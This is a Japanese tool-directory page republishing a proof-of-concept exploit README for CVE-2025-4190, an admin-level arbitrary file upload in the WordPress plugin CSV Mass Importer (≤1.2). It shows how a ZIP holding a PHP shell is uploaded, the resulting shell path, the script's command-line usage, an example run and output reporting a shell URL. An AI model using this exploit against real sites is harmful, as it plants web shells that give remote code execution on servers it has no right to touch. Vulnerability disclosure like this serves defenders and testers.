Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-4190 — CSV Mass Importer <= 1.2 - Admin+ 任意のファイルアップロード | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-4190
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-4190

CVE-2025-4190

CSV Mass Importer <= 1.2 - Admin+ 任意のファイルアップロード

リポジトリを見る
31年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-4190 — WordPress CSV Mass Importer ≤ 1.2 任意ファイルアップロード

WordPress Plugin
CVE
Status
Author


📌 説明

WordPress用プラグイン CSV Mass Importer(≤ 1.2)には、Admin+ 任意ファイルアップロードの脆弱性が存在します。
アップロードファイルの検証が不適切なため、高い権限を持つユーザー(管理者など)は、たとえばマルチサイト環境などで制限されるべき場合でも、サーバー上に任意のファイルをアップロードできます。

この脆弱性により、攻撃者はPHPシェルや悪意のあるファイルをアップロードでき、サーバー上で**リモートコード実行(RCE)**につながります。

発見者: Nxploited (Khaled Alenazi)。


🔥 詳細

  • プラグイン名: CSV Mass Importer
  • 影響を受けるバージョン: ≤ 1.2
  • 脆弱性の種類: Admin+ 任意ファイルアップロード
  • CVE: CVE-2025-4190
  • WPVDB ID: e525ece5-6e03-4aee-bf5b-6ae0b961f027
  • 元の研究者: Khaled Alenazi (Nxploited)
  • 提出者ウェブサイト: https://github.com/Nxploited
  • 検証済み: ✅

💻 概念実証(PoC)

このプラグインは、CSVインポート機能を使用する際にアップロードされたファイルを適切にチェックしません。
PHPシェルを含む細工されたZIPファイルをアップロードし、公開アクセス可能なディレクトリに展開できます。

シェルのパス例:

root@kitploit:~
<target-url>/wp-content/uploads/cmi-data/nxploited.php

🚀 使い方

スクリプト

このリポジトリには、すぐに使えるPythonエクスプロイトスクリプト 4190.py が含まれています。

ヘルプメニュー

root@kitploit:~
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL
  --username, -un USERNAME
                        WordPress admin username
  --password, -p PASSWORD
                        WordPress admin password

実行例

root@kitploit:~
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin

期待される出力

root@kitploit:~
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)

🕰 タイムライン

  • 公開日: 2025-04-26(約11日前)
  • データベース追加日: 2025-05-07(約1時間前)
  • 最終更新日: 2025-05-07(約1時間前)

🛡 参考情報

  • WPScan の CVE-2025-4190

⚠ 免責事項

このコードは教育目的のみで提供されています。
作者は、このスクリプトによって引き起こされた誤用や損害について一切責任を負いません。
責任を持って、テストを許可されたシステムでのみ使用してください。


Khaled Alenazi (Nxploited) によって発見・開発されました 🌟

ツールをダウンロード